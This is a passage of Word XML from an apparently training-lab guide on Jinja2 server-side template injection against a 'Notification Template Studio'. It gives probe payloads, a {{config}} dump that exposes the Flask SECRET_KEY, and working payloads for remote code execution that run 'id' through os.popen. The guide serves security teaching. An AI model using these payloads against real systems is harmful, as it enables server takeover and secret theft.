        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-Side Template Injection (SSTI)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SSTI occurs when user-controlled input is embedded into a server-side template that is then rendered by a template engine. Jinja2 templates can access Python objects — an attacker can traverse Python's class hierarchy to reach os.popen() and execute arbitrary commands.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Navigate to Notification Template Studio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Notifications → Notification Template Studio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Normal use: enter a Jinja2 template, optionally a JSON context, and preview the rendered output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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The template is rendered directly by Jinja2 Environment — no sandbox!</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirm SSTI with math probe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Math {{7*7}}" preset — template: {{7*7}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click Preview → Response shows: "49"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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This confirms the template engine evaluated the expression.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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{{7*7}} returns "49" in Jinja2 (vs "7777777" in Twig, "49" in Freemarker).</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// SSTI confirmation payloads:
{{7*7}}              → 49  (Jinja2 confirmed)
{{7*'7'}}            → 7777777  (if Jinja2)
{{config}}           → dumps Flask application config
{{request}}          → Flask request object
{{self.__dict__}}    → template self object</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Dump Flask config — access secret keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Dump Config" preset — template: {{config}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response includes Flask app configuration object.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Contains SECRET_KEY and other sensitive configuration values!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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This confirms full Python object access from the template.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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalate to RCE via Python class hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Jinja2 allows traversing Python internals via MRO (Method Resolution Order).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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By navigating __mro__[1].__subclasses__(), we can find the subprocess.Popen class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B"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Once found, we call it to run OS commands.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">// Step 1: Get all subclasses of object:
{{''.__class__.__mro__[1].__subclasses__()}}
// Look through the list for subprocess.Popen or catch_warnings
// Step 2: Find the index of &lt;class 'subprocess.Popen'&gt;:
// Count in the output — let's say it's index 317
// Step 3: Execute command:
{{''.__class__.__mro__[1].__subclasses__()[317](['id'],stdout=-1).communicate()}}
// Alternative — simpler if __builtins__ accessible:
{{config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
// Or via lipsum global (always available in Jinja2):
{{lipsum.__globals__['__import__']('os').popen('id').read()}}</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirm SSTI with {{7*7}} → 49. Dump config with {{config}}. Escalate to RCE using subclasses chain or lipsum globals to run id/whoami command on server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
